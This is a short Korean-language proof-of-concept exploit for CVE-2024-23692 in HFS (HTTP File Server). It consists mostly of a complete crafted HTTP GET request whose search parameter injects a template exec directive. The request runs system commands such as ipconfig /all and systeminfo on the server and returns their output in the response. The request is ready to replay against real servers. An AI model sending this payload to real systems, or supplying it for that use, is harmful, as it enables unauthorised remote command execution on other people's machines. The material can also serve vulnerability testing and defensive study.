
CVE-2024-23692에 대한 개념 증명 익스플로잇으로, 조작된 HTTP 요청을 통해 HFS에서 명령 삽입을 수행하여 시스템 명령을 실행하고 출력을 검색합니다.
BURP POC
GET /?n=%0A&cmd=ipconfig+/all&search=%25xxx%25url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: HFS_SID_=0.344328237697482
Upgrade-Insecure-Requests: 1
=========================================================

COMMAND=systeminfo
에코 메시지가 약 100줄의 RAW 응답임을 확인할 수 있습니다.